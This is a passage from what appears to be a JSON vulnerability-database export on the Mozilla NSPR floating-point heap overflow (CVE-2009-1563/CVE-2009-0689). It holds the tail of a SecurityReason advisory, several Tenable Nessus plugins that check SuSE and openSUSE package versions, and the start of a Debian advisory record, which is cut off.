/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n--- 5. Credits ---\r\nDiscovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.\r\n\r\n\r\n--- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n--- 7. Contact ---\r\nEmail:\r\n- cxib {a.t] securityreason [d0t} com\r\n- sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\n ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-18465"}], "nessus": [{"lastseen": "2021-01-17T14:46:35", "description": "This update fixes a bug in the Mozilla NSPR helper libraries, which\ncould be used by remote attackers to potentially execute code via\nJavaScript vectors.\n\n - Security researcher Alin Rad Pop of Secunia Research\n reported a heap-based buffer overflow in Mozilla's\n string to floating point number conversion routines.\n Using this vulnerability an attacker could craft some\n malicious JavaScript code containing a very long string\n to be converted to a floating point number which would\n result in improper memory allocation and the execution\n of an arbitrary memory location. This vulnerability\n could thus be leveraged by the attacker to run arbitrary\n code on a victim's computer. (MFSA 2009-59 /\n CVE-2009-1563)", "edition": 24, "published": "2009-11-09T00:00:00", "title": "SuSE 10 Security Update : mozilla-nspr (ZYPP Patch Number 6630)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2009-11-09T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_MOZILLA-NSPR-6630.NASL", "href": "https://www.tenable.com/plugins/nessus/42421", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42421);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0689\");\n\n script_name(english:\"SuSE 10 Security Update : mozilla-nspr (ZYPP Patch Number 6630)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a bug in the Mozilla NSPR helper libraries, which\ncould be used by remote attackers to potentially execute code via\nJavaScript vectors.\n\n - Security researcher Alin Rad Pop of Secunia Research\n reported a heap-based buffer overflow in Mozilla's\n string to floating point number conversion routines.\n Using this vulnerability an attacker could craft some\n malicious JavaScript code containing a very long string\n to be converted to a floating point number which would\n result in improper memory allocation and the execution\n of an arbitrary memory location. This vulnerability\n could thus be leveraged by the attacker to run arbitrary\n code on a victim's computer. (MFSA 2009-59 /\n CVE-2009-1563)\"\n );\n # http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2009-59/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1563.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6630.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/10/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"mozilla-nspr-4.8.2-1.5.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"mozilla-nspr-devel-4.8.2-1.5.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"mozilla-nspr-32bit-4.8.2-1.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"mozilla-nspr-4.8.2-1.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"mozilla-nspr-devel-4.8.2-1.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"mozilla-nspr-32bit-4.8.2-1.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:03:34", "description": "This update fixes a bug in the Mozilla NSPR helper libraries, which\ncould be used by remote attackers to potentially execute code via\nJavaScript vectors.\n\nMFSA 2009-59 / CVE-2009-1563: Security researcher Alin Rad Pop of\nSecunia Research reported a heap-based buffer overflow in Mozilla's\nstring to floating point number conversion routines. Using this\nvulnerability an attacker could craft some malicious JavaScript code\ncontaining a very long string to be converted to a floating point\nnumber which would result in improper memory allocation and the\nexecution of an arbitrary memory location. This vulnerability could\nthus be leveraged by the attacker to run arbitrary code on a victim's\ncomputer.", "edition": 24, "published": "2009-11-09T00:00:00", "title": "openSUSE Security Update : mozilla-nspr (mozilla-nspr-1510)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2009-11-09T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:mozilla-nspr", "p-cpe:/a:novell:opensuse:mozilla-nspr-32bit", "p-cpe:/a:novell:opensuse:mozilla-nspr-devel"], "id": "SUSE_11_0_MOZILLA-NSPR-091104.NASL", "href": "https://www.tenable.com/plugins/nessus/42416", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update mozilla-nspr-1510.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42416);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0689\");\n\n script_name(english:\"openSUSE Security Update : mozilla-nspr (mozilla-nspr-1510)\");\n script_summary(english:\"Check for the mozilla-nspr-1510 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a bug in the Mozilla NSPR helper libraries, which\ncould be used by remote attackers to potentially execute code via\nJavaScript vectors.\n\nMFSA 2009-59 / CVE-2009-1563: Security researcher Alin Rad Pop of\nSecunia Research reported a heap-based buffer overflow in Mozilla's\nstring to floating point number conversion routines. Using this\nvulnerability an attacker could craft some malicious JavaScript code\ncontaining a very long string to be converted to a floating point\nnumber which would result in improper memory allocation and the\nexecution of an arbitrary memory location. This vulnerability could\nthus be leveraged by the attacker to run arbitrary code on a victim's\ncomputer.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=546371\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mozilla-nspr packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nspr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nspr-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nspr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mozilla-nspr-4.8.2-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mozilla-nspr-devel-4.8.2-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", cpu:\"x86_64\", reference:\"mozilla-nspr-32bit-4.8.2-1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mozilla-nspr\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:04:52", "description": "This update fixes a bug in the Mozilla NSPR helper libraries, which\ncould be used by remote attackers to potentially execute code via\nJavaScript vectors.\n\nMFSA 2009-59 / CVE-2009-1563: Security researcher Alin Rad Pop of\nSecunia Research reported a heap-based buffer overflow in Mozilla's\nstring to floating point number conversion routines. Using this\nvulnerability an attacker could craft some malicious JavaScript code\ncontaining a very long string to be converted to a floating point\nnumber which would result in improper memory allocation and the\nexecution of an arbitrary memory location. This vulnerability could\nthus be leveraged by the attacker to run arbitrary code on a victim's\ncomputer.", "edition": 24, "published": "2009-11-09T00:00:00", "title": "openSUSE Security Update : mozilla-nspr (mozilla-nspr-1510)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2009-11-09T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mozilla-nspr", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:mozilla-nspr-32bit", "p-cpe:/a:novell:opensuse:mozilla-nspr-devel"], "id": "SUSE_11_1_MOZILLA-NSPR-091104.NASL", "href": "https://www.tenable.com/plugins/nessus/42418", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update mozilla-nspr-1510.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42418);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0689\");\n\n script_name(english:\"openSUSE Security Update : mozilla-nspr (mozilla-nspr-1510)\");\n script_summary(english:\"Check for the mozilla-nspr-1510 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a bug in the Mozilla NSPR helper libraries, which\ncould be used by remote attackers to potentially execute code via\nJavaScript vectors.\n\nMFSA 2009-59 / CVE-2009-1563: Security researcher Alin Rad Pop of\nSecunia Research reported a heap-based buffer overflow in Mozilla's\nstring to floating point number conversion routines. Using this\nvulnerability an attacker could craft some malicious JavaScript code\ncontaining a very long string to be converted to a floating point\nnumber which would result in improper memory allocation and the\nexecution of an arbitrary memory location. This vulnerability could\nthus be leveraged by the attacker to run arbitrary code on a victim's\ncomputer.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=546371\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mozilla-nspr packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nspr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nspr-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nspr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mozilla-nspr-4.8.2-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mozilla-nspr-devel-4.8.2-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"mozilla-nspr-32bit-4.8.2-1.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mozilla-nspr\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:13:32", "description": "This update fixes a bug in the Mozilla NSPR helper libraries, which\ncould be used by remote attackers to potentially execute code via\nJavaScript vectors.\n\n - Security researcher Alin Rad Pop of Secunia Research\n reported a heap-based buffer overflow in Mozilla's\n string to floating point number conversion routines.\n Using this vulnerability an attacker could craft some\n malicious JavaScript code containing a very long string\n to be converted to a floating point number which would\n result in improper memory allocation and the execution\n of an arbitrary memory location. This vulnerability\n could thus be leveraged by the attacker to run arbitrary\n code on a victim's computer. (MFSA 2009-59 /\n CVE-2009-1563)", "edition": 24, "published": "2009-11-09T00:00:00", "title": "SuSE 11 Security Update : Mozilla (SAT Patch Number 1503)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2009-11-09T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:mozilla-nspr-32bit", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:mozilla-nspr"], "id": "SUSE_11_MOZILLA-NSPR-091103.NASL", "href": "https://www.tenable.com/plugins/nessus/42420", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42420);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0689\");\n\n script_name(english:\"SuSE 11 Security Update : Mozilla (SAT Patch Number 1503)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a bug in the Mozilla NSPR helper libraries, which\ncould be used by remote attackers to potentially execute code via\nJavaScript vectors.\n\n - Security researcher Alin Rad Pop of Secunia Research\n reported a heap-based buffer overflow in Mozilla's\n string to floating point number conversion routines.\n Using this vulnerability an attacker could craft some\n malicious JavaScript code containing a very long string\n to be converted to a floating point number which would\n result in improper memory allocation and the execution\n of an arbitrary memory location. This vulnerability\n could thus be leveraged by the attacker to run arbitrary\n code on a victim's computer. (MFSA 2009-59 /\n CVE-2009-1563)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=546371\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1563.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 1503.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-nspr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-nspr-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-nspr-4.8.2-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-nspr-4.8.2-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-nspr-32bit-4.8.2-1.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-nspr-4.8.2-1.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"mozilla-nspr-32bit-4.8.2-1.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-nspr-32bit-4.8.2-1.1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:46:35", "description": "This update fixes a bug in the Mozilla NSPR helper libraries, which\ncould be used by remote attackers to potentially execute code via\nJavaScript vectors.\n\n - Security researcher Alin Rad Pop of Secunia Research\n reported a heap-based buffer overflow in Mozilla's\n string to floating point number conversion routines.\n Using this vulnerability an attacker could craft some\n malicious JavaScript code containing a very long string\n to be converted to a floating point number which would\n result in improper memory allocation and the execution\n of an arbitrary memory location. This vulnerability\n could thus be leveraged by the attacker to run arbitrary\n code on a victim's computer. (MFSA 2009-59 /\n CVE-2009-1563)", "edition": 24, "published": "2010-10-11T00:00:00", "title": "SuSE 10 Security Update : mozilla-nspr (ZYPP Patch Number 6631)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2010-10-11T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_MOZILLA-NSPR-6631.NASL", "href": "https://www.tenable.com/plugins/nessus/49895", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49895);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0689\");\n\n script_name(english:\"SuSE 10 Security Update : mozilla-nspr (ZYPP Patch Number 6631)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a bug in the Mozilla NSPR helper libraries, which\ncould be used by remote attackers to potentially execute code via\nJavaScript vectors.\n\n - Security researcher Alin Rad Pop of Secunia Research\n reported a heap-based buffer overflow in Mozilla's\n string to floating point number conversion routines.\n Using this vulnerability an attacker could craft some\n malicious JavaScript code containing a very long string\n to be converted to a floating point number which would\n result in improper memory allocation and the execution\n of an arbitrary memory location. This vulnerability\n could thus be leveraged by the attacker to run arbitrary\n code on a victim's computer. (MFSA 2009-59 /\n CVE-2009-1563)\"\n );\n # http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2009-59/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1563.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6631.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/10/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"mozilla-nspr-4.8.2-1.5.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"mozilla-nspr-devel-4.8.2-1.5.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"mozilla-nspr-32bit-4.8.2-1.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"mozilla-nspr-4.8.2-1.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"mozilla-nspr-devel-4.8.2-1.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"mozilla-nspr-32bit-4.8.2-1.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:45:44", "description": "Several vulnerabilities have been discovered in the NetScape Portable\nRuntime Library, which may lead to the execution of arbitrary code.\nThe Common Vulnerabilities and Exposures project identifies the\nfollowing problems :\n\n - CVE-2009-1563\n A programming error in the string handling code may lead\n to the execution of arbitrary code.\n\n - CVE-2009-2463\n An integer overflow in the Base64 decoding functions may\n lead to the execution of arbitrary code.", "edition": 28, "published": "2010-02-24T00:00:00", "title": "Debian DSA-1931-1 : nspr - several vulnerabilities", "type": "nessus", 